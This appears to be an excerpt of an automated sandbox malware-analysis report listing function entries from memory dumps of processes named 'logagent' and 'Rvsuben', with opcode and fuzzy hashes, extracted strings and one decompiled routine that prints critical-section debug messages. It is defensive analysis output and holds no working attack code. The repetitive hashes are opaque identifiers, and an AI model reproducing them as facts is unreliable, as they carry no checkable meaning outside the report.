                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.625881473.0000000005190000.00000040.00000800.00020000.00000000.sdmp, Offset: 05190000, based on PE: true
                                              • Associated: 00000008.00000002.626869305.00000000052AB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000008.00000002.626998143.00000000052AF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_5190000_logagent.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: b00debd49c70ee5288f25ab59d13f31965e7cbbfa7091c75e5546dba9fb0aa80
                                              • Instruction ID: 57b8ddf914819c11733ac56ba68b61733ecd6dc9d920d7180e8cb4b3d5b2c416
                                              • Opcode Fuzzy Hash: b00debd49c70ee5288f25ab59d13f31965e7cbbfa7091c75e5546dba9fb0aa80
                                              • Instruction Fuzzy Hash: A39002A222300042D20461A9444470600559BE1251F91D012A2144558DC5E98C616165
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 051F95F0 Relevance: .0, Instructions: 4COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.625881473.0000000005190000.00000040.00000800.00020000.00000000.sdmp, Offset: 05190000, based on PE: true
                                              • Associated: 00000008.00000002.626869305.00000000052AB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000008.00000002.626998143.00000000052AF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_5190000_logagent.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 5236f2147290a944ef257c70657d944dfb916746f59e0f58efd376dd5825ab17
                                              • Instruction ID: ff0e3a1a28d45ce82e04e2743715678cb9caa8440f282abe965bd1b1f1df40f0
                                              • Opcode Fuzzy Hash: 5236f2147290a944ef257c70657d944dfb916746f59e0f58efd376dd5825ab17
                                              • Instruction Fuzzy Hash: E590027221300802D20461A9484468600159BD0351F91D011A6014659F96E588917171
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 051F9820 Relevance: .0, Instructions: 4COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.625881473.0000000005190000.00000040.00000800.00020000.00000000.sdmp, Offset: 05190000, based on PE: true
                                              • Associated: 00000008.00000002.626869305.00000000052AB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000008.00000002.626998143.00000000052AF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_5190000_logagent.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 9940ecff23b825dd531c1c66860faa9bba87407620676f0b05e39c626d98c9fb
                                              • Instruction ID: e04ca321d01a62970be524284de90f3faf1136e30f39743ecab8bfb6822be818
                                              • Opcode Fuzzy Hash: 9940ecff23b825dd531c1c66860faa9bba87407620676f0b05e39c626d98c9fb
                                              • Instruction Fuzzy Hash: 1690027225300402D24171A944446060019ABD0291FD1D012A0414558F86D58A56BAA1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 051FB040 Relevance: .0, Instructions: 4COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.625881473.0000000005190000.00000040.00000800.00020000.00000000.sdmp, Offset: 05190000, based on PE: true
                                              • Associated: 00000008.00000002.626869305.00000000052AB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000008.00000002.626998143.00000000052AF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_5190000_logagent.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 9191664f59762f0121f37a6809f19fe8b860e099837265f203fa86f78f4f9234
                                              • Instruction ID: 836c261079d64e0efc476e977794ab2f0452a5b16762fa5a299cebc582ae8ea3
                                              • Opcode Fuzzy Hash: 9191664f59762f0121f37a6809f19fe8b860e099837265f203fa86f78f4f9234
                                              • Instruction Fuzzy Hash: FA9002A2613140434640B1A948444065025ABE13513D1D121A0444564D86E88855A2A5
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 051F98A0 Relevance: .0, Instructions: 4COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.625881473.0000000005190000.00000040.00000800.00020000.00000000.sdmp, Offset: 05190000, based on PE: true
                                              • Associated: 00000008.00000002.626869305.00000000052AB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000008.00000002.626998143.00000000052AF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_5190000_logagent.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: b3b625756528316768b967e7e7b11fa15abcc4229247bb727f7a231d2684ae1f
                                              • Instruction ID: 98b66f6697df7f8832e73c84981917b26ac3800e9c691e9a93e3a12d10733c3f
                                              • Opcode Fuzzy Hash: b3b625756528316768b967e7e7b11fa15abcc4229247bb727f7a231d2684ae1f
                                              • Instruction Fuzzy Hash: 5990026231300402D20261A944546060019DBD1395FD1D012E1414559E86E58953B172
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 051FA710 Relevance: .0, Instructions: 4COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.625881473.0000000005190000.00000040.00000800.00020000.00000000.sdmp, Offset: 05190000, based on PE: true
                                              • Associated: 00000008.00000002.626869305.00000000052AB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000008.00000002.626998143.00000000052AF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_5190000_logagent.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 87298191789ed03b8b943ba12dd286722915f2d1711f00f0e617514b1ff4a204
                                              • Instruction ID: 4696fa0318be0bc8057ad7306f8d1cb73a8bf52fa90c28d2923fd2ee9b223398
                                              • Opcode Fuzzy Hash: 87298191789ed03b8b943ba12dd286722915f2d1711f00f0e617514b1ff4a204
                                              • Instruction Fuzzy Hash: 9B900272313000529600A6E95844A4A41159BF0351B91E015A4004558D85D488616161
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 051F9B00 Relevance: .0, Instructions: 4COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.625881473.0000000005190000.00000040.00000800.00020000.00000000.sdmp, Offset: 05190000, based on PE: true
                                              • Associated: 00000008.00000002.626869305.00000000052AB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000008.00000002.626998143.00000000052AF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_5190000_logagent.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 6f24edd869320995513bfb87ac50ad78352e17611ee972e9b1fe57664d95846d
                                              • Instruction ID: cb7a500f16a345635ea8c29e1f5618849a107f04d75f78af732ee2f0d119e34d
                                              • Opcode Fuzzy Hash: 6f24edd869320995513bfb87ac50ad78352e17611ee972e9b1fe57664d95846d
                                              • Instruction Fuzzy Hash: FF90026225300802D24071A984547070016DBD0651F91D011A0014558E86D6896576F1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 051F9730 Relevance: .0, Instructions: 4COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.625881473.0000000005190000.00000040.00000800.00020000.00000000.sdmp, Offset: 05190000, based on PE: true
                                              • Associated: 00000008.00000002.626869305.00000000052AB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000008.00000002.626998143.00000000052AF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_5190000_logagent.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: c17f5f7ca6838c4062afdac6134890782653f9bf0dabce74693d2aad6d99e30f
                                              • Instruction ID: d79513fa925b71cd08192bb81d18c84375728571e278f7a45d70fe1b0a946ed6
                                              • Opcode Fuzzy Hash: c17f5f7ca6838c4062afdac6134890782653f9bf0dabce74693d2aad6d99e30f
                                              • Instruction Fuzzy Hash: 1F90026261700402D24071A9545870600259BD0251F91E011A0014558EC6D98A5576E1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 051F9770 Relevance: .0, Instructions: 4COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.625881473.0000000005190000.00000040.00000800.00020000.00000000.sdmp, Offset: 05190000, based on PE: true
                                              • Associated: 00000008.00000002.626869305.00000000052AB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000008.00000002.626998143.00000000052AF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_5190000_logagent.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 7476080b61aeed996cdc5abade359b075e2c62ba9ee992c238c9761438ef206b
                                              • Instruction ID: 60e452000cecceecdd6b843fdca2b078ed0d9e602471326633da9e2f3240a183
                                              • Opcode Fuzzy Hash: 7476080b61aeed996cdc5abade359b075e2c62ba9ee992c238c9761438ef206b
                                              • Instruction Fuzzy Hash: 1E90026221704442D20065A95448A0600159BD0255F91E011A1054599EC6F58851B171
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 051FA770 Relevance: .0, Instructions: 4COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.625881473.0000000005190000.00000040.00000800.00020000.00000000.sdmp, Offset: 05190000, based on PE: true
                                              • Associated: 00000008.00000002.626869305.00000000052AB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000008.00000002.626998143.00000000052AF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_5190000_logagent.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 92705f5915517c40df7552a5500b52cc62f5b8507f981c7ab43b387e6fd830a3
                                              • Instruction ID: 0ecb849f050a254280413652c16285d41c03fee7bfbff261f2916d69f0589254
                                              • Opcode Fuzzy Hash: 92705f5915517c40df7552a5500b52cc62f5b8507f981c7ab43b387e6fd830a3
                                              • Instruction Fuzzy Hash: 9590027621704442D60065A95844A8700159BD0355F91E411A041459CE86D48861B161
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 051F9760 Relevance: .0, Instructions: 4COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.625881473.0000000005190000.00000040.00000800.00020000.00000000.sdmp, Offset: 05190000, based on PE: true
                                              • Associated: 00000008.00000002.626869305.00000000052AB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000008.00000002.626998143.00000000052AF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_5190000_logagent.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 9efc6162f1bc8e58d28e9c3bd31c43ee4e03abeb5d5bd743b7b3350e67422ec5
                                              • Instruction ID: 92ece20583840295b9644e7dd5d3f36ee3d7ae42bda7b1db5a5105a8d8ff16ce
                                              • Opcode Fuzzy Hash: 9efc6162f1bc8e58d28e9c3bd31c43ee4e03abeb5d5bd743b7b3350e67422ec5
                                              • Instruction Fuzzy Hash: F190027221300403D20061A9554870700159BD0251F91E411A041455CED6D688517161
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 051FA3B0 Relevance: .0, Instructions: 4COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.625881473.0000000005190000.00000040.00000800.00020000.00000000.sdmp, Offset: 05190000, based on PE: true
                                              • Associated: 00000008.00000002.626869305.00000000052AB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000008.00000002.626998143.00000000052AF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_5190000_logagent.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 42f0d7ee550296a025a0b1445d4887236f13c1eb39deed3357e2a13c974bfc62
                                              • Instruction ID: 0efcf2e291bde0fe0f1163046d5050a3cced88b31b854f59f37bf451a662b843
                                              • Opcode Fuzzy Hash: 42f0d7ee550296a025a0b1445d4887236f13c1eb39deed3357e2a13c974bfc62
                                              • Instruction Fuzzy Hash: 4690027221344002D24071A9848460B5015ABE0351F91D411E0415558D86D58856A261
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 051F9610 Relevance: .0, Instructions: 4COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.625881473.0000000005190000.00000040.00000800.00020000.00000000.sdmp, Offset: 05190000, based on PE: true
                                              • Associated: 00000008.00000002.626869305.00000000052AB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000008.00000002.626998143.00000000052AF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_5190000_logagent.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 7117efe2a6874c2d0ba2aa0ccb8f91ed21690663b0327a58fe11fbe93d36a6b0
                                              • Instruction ID: 7793ac52876923aaad6952f5b96a4f8016f5a7a0a2d2dc6e3f6d029e54a13e55
                                              • Opcode Fuzzy Hash: 7117efe2a6874c2d0ba2aa0ccb8f91ed21690663b0327a58fe11fbe93d36a6b0
                                              • Instruction Fuzzy Hash: A690027261700802D25071A9445474600159BD0351F91D011A0014658E87D58A5576E1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 051F9A10 Relevance: .0, Instructions: 4COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.625881473.0000000005190000.00000040.00000800.00020000.00000000.sdmp, Offset: 05190000, based on PE: true
                                              • Associated: 00000008.00000002.626869305.00000000052AB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000008.00000002.626998143.00000000052AF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_5190000_logagent.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 3c7eaa9f55b717a0dc659ec3ae019295c9c2a9ca5a722be9e0a2f1cf1d38a244
                                              • Instruction ID: bcd37d026b0ea5e980d8a0538a0c6c71bd56cff5f592196460f3a67b107404a5
                                              • Opcode Fuzzy Hash: 3c7eaa9f55b717a0dc659ec3ae019295c9c2a9ca5a722be9e0a2f1cf1d38a244
                                              • Instruction Fuzzy Hash: CB90027221340402D20061A9484874700159BD0352F91D011A5154559F86E5C8917571
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 051F9650 Relevance: .0, Instructions: 4COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.625881473.0000000005190000.00000040.00000800.00020000.00000000.sdmp, Offset: 05190000, based on PE: true
                                              • Associated: 00000008.00000002.626869305.00000000052AB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000008.00000002.626998143.00000000052AF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_5190000_logagent.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 7ed7af1d4623fc85b154cc55cffd06944ff526b305c8b996d1c6979153dfa1b1
                                              • Instruction ID: fda88c7e83418de2c23397ee4c4de58bf4f95a4e34fb5a55c2d78a6c48992045
                                              • Opcode Fuzzy Hash: 7ed7af1d4623fc85b154cc55cffd06944ff526b305c8b996d1c6979153dfa1b1
                                              • Instruction Fuzzy Hash: C290027221704842D24071A94444A4600259BD0355F91D011A0054698E96E58D55B6A1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 051F9A80 Relevance: .0, Instructions: 4COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.625881473.0000000005190000.00000040.00000800.00020000.00000000.sdmp, Offset: 05190000, based on PE: true
                                              • Associated: 00000008.00000002.626869305.00000000052AB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000008.00000002.626998143.00000000052AF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_5190000_logagent.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: dafe52a2b617688fe492bbb0372dc51067435caf0835852217446ca779d0da21
                                              • Instruction ID: 7a5dcfa9837f6eb707bf99ca71f31cea968ed7b4691d5e663ddaf289a18cdf48
                                              • Opcode Fuzzy Hash: dafe52a2b617688fe492bbb0372dc51067435caf0835852217446ca779d0da21
                                              • Instruction Fuzzy Hash: 2F90026221344442D24062A94844B0F41159BE1252FD1D019A4146558DC9D588556761
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 051F96D0 Relevance: .0, Instructions: 4COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.625881473.0000000005190000.00000040.00000800.00020000.00000000.sdmp, Offset: 05190000, based on PE: true
                                              • Associated: 00000008.00000002.626869305.00000000052AB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000008.00000002.626998143.00000000052AF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_5190000_logagent.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: db1b73c03fba161006268673ece33c42d788c8d404a2f983293e8dd52b43a8c1
                                              • Instruction ID: 1b50d67821cf893fd5a287b0311bae52df050f478eb5bb3b07e811f63656cf0d
                                              • Opcode Fuzzy Hash: db1b73c03fba161006268673ece33c42d788c8d404a2f983293e8dd52b43a8c1
                                              • Instruction Fuzzy Hash: C590027221300842D20061A94444B4600159BE0351F91D016A0114658E86D5C8517561
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 051F9670 Relevance: .0, Instructions: 2COMMONLIBRARYCODE
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.625881473.0000000005190000.00000040.00000800.00020000.00000000.sdmp, Offset: 05190000, based on PE: true
                                              • Associated: 00000008.00000002.626869305.00000000052AB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000008.00000002.626998143.00000000052AF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_5190000_logagent.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                              • Instruction ID: ef2c19dff750e2aa6bc2d2bdae0e117b8fb229d6480b6361d3d1b2620358ea20
                                              • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                              • Instruction Fuzzy Hash:
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0524FDDA Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 53%
                                              			E0524FDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E051FCE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E05245720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E05245720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}










                                              0x0524fdda
                                              0x0524fde2
                                              0x0524fde5
                                              0x0524fdec
                                              0x0524fdfa
                                              0x0524fdff
                                              0x0524fe0a
                                              0x0524fe0f
                                              0x0524fe17
                                              0x0524fe1e
                                              0x0524fe19
                                              0x0524fe19
                                              0x0524fe19
                                              0x0524fe20
                                              0x0524fe21
                                              0x0524fe22
                                              0x0524fe25
                                              0x0524fe40

                                              APIs
                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0524FDFA
                                              Strings
                                              • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 0524FE2B
                                              • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 0524FE01
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.625881473.0000000005190000.00000040.00000800.00020000.00000000.sdmp, Offset: 05190000, based on PE: true
                                              • Associated: 00000008.00000002.626869305.00000000052AB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000008.00000002.626998143.00000000052AF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_5190000_logagent.jbxd
                                              Similarity
                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                              • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                              • API String ID: 885266447-3903918235
                                              • Opcode ID: 1117a51c9d0f0baa1cb919a9a5aa48cca2248035b4557247175d2810efd79844
                                              • Instruction ID: 4f5873bad1f655ee36d4edabfcf0678ec24b352f0560191a5c4088a496fe7233
                                              • Opcode Fuzzy Hash: 1117a51c9d0f0baa1cb919a9a5aa48cca2248035b4557247175d2810efd79844
                                              • Instruction Fuzzy Hash: 0AF0C236354201BBE6291A45DD46E23BB5AEF84730F144214F6685A5D1DA62A8609AE0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Non-executed Functions

                                              Function 03A1C288 Relevance: 12.7, Strings: 10, Instructions: 154COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000C.00000003.577264949.00000000039E0000.00000004.00001000.00020000.00000000.sdmp, Offset: 039E0000, based on PE: false
                                              • Associated: 0000000C.00000003.517068470.00000000039E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000C.00000003.548056954.00000000039E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_12_3_39e0000_Rvsuben.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: 0$0$DA$DA$PA$PA$PA$PA$PA$PA
                                              • API String ID: 0-2358991012
                                              • Opcode ID: 7d25a00423745d3b2a214bbda53d671981deb7e52be67523b5b561d1b491aebe
                                              • Instruction ID: 57951c41ece0cff003a6b8d437f23ca66a36b25f41580e323aaa4c5295ce056e
                                              • Opcode Fuzzy Hash: 7d25a00423745d3b2a214bbda53d671981deb7e52be67523b5b561d1b491aebe
                                              • Instruction Fuzzy Hash: 3251523CE043489BCB11EFA9D6C46EEF7B5AF48310F24846BD551AB380C7749E568B61
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 03A042A0 Relevance: 10.1, Strings: 8, Instructions: 78COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000C.00000003.548056954.00000000039E0000.00000004.00001000.00020000.00000000.sdmp, Offset: 039E0000, based on PE: false
                                              • Associated: 0000000C.00000003.517068470.00000000039E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000C.00000003.577264949.00000000039E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_12_3_39e0000_Rvsuben.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: (BB$,gB$8AB$@AB$XgB$`BB$@B$fB
                                              • API String ID: 0-1923117878
                                              • Opcode ID: 0dbbffdedc7c4380a1727c0380f9d091c1d5f2ead1ebdc2ea9b73b1f200978ed
                                              • Instruction ID: 5e14277fc390a6c25459d2ec86827ebf9e5ac23ce47d2cae6e4d535e74cb4119
                                              • Opcode Fuzzy Hash: 0dbbffdedc7c4380a1727c0380f9d091c1d5f2ead1ebdc2ea9b73b1f200978ed
                                              • Instruction Fuzzy Hash: 0521F739B152908FD304FBA8F90461D2351DBC6398FD18136A744AF7A4CA3DEC528BAD
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 03A042B0 Relevance: 10.1, Strings: 8, Instructions: 75COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000C.00000003.548056954.00000000039E0000.00000004.00001000.00020000.00000000.sdmp, Offset: 039E0000, based on PE: false
                                              • Associated: 0000000C.00000003.517068470.00000000039E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000C.00000003.577264949.00000000039E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_12_3_39e0000_Rvsuben.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: (BB$,gB$8AB$@AB$XgB$`BB$@B$fB
                                              • API String ID: 0-1923117878
                                              • Opcode ID: f785aee22f59f34da2478701773c201c5604347d15cbbad142a3ada5a8871570
                                              • Instruction ID: 5601911542eaf1f24669ecf4021cce56c7bd053dc3fe540733c882309a9b6519
                                              • Opcode Fuzzy Hash: f785aee22f59f34da2478701773c201c5604347d15cbbad142a3ada5a8871570
                                              • Instruction Fuzzy Hash: 5221E93DB152A08FD304FB68F90465D2351DBC2398FD18276A744AF7A0CA2DEC118B9D
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 03A04134 Relevance: 7.7, Strings: 6, Instructions: 205COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000C.00000003.548056954.00000000039E0000.00000004.00001000.00020000.00000000.sdmp, Offset: 039E0000, based on PE: false
                                              • Associated: 0000000C.00000003.517068470.00000000039E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000C.00000003.577264949.00000000039E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_12_3_39e0000_Rvsuben.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: (BB$,gB$8AB$@AB$XgB$`BB
                                              • API String ID: 0-1946087534
                                              • Opcode ID: 9b4a9818c4a089ddc547fc695a053642be801bd80edb4466bfe40561fe7a8644
                                              • Instruction ID: 083ab4f3397312272e20c1efcd1635a795497c89bd27899cd160c3c37a0ccf49
                                              • Opcode Fuzzy Hash: 9b4a9818c4a089ddc547fc695a053642be801bd80edb4466bfe40561fe7a8644
                                              • Instruction Fuzzy Hash: 2371AA5029E3C04FC31787606D298A93F349A8322975B92EBD2C2DFDB3C51D4C1B8B26
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 03A04260 Relevance: 7.6, Strings: 6, Instructions: 66COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000C.00000003.548056954.00000000039E0000.00000004.00001000.00020000.00000000.sdmp, Offset: 039E0000, based on PE: false
                                              • Associated: 0000000C.00000003.517068470.00000000039E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000C.00000003.577264949.00000000039E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_12_3_39e0000_Rvsuben.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: (BB$,gB$8AB$@AB$XgB$`BB
                                              • API String ID: 0-1946087534
                                              • Opcode ID: 065f8e592d557a05b3a48ef13486a69185b96ce8bcb30aee00c494150371777a
                                              • Instruction ID: 7d5be7ca7693b7884ff90a53564eed7a442b922601ea30ee500d9a14325582bb
                                              • Opcode Fuzzy Hash: 065f8e592d557a05b3a48ef13486a69185b96ce8bcb30aee00c494150371777a
                                              • Instruction Fuzzy Hash: 0421492475D3D08FC3129764AD255593F31DBC3304B9685FBD2819FAB3C62D9C068B6A
                                              Uniqueness

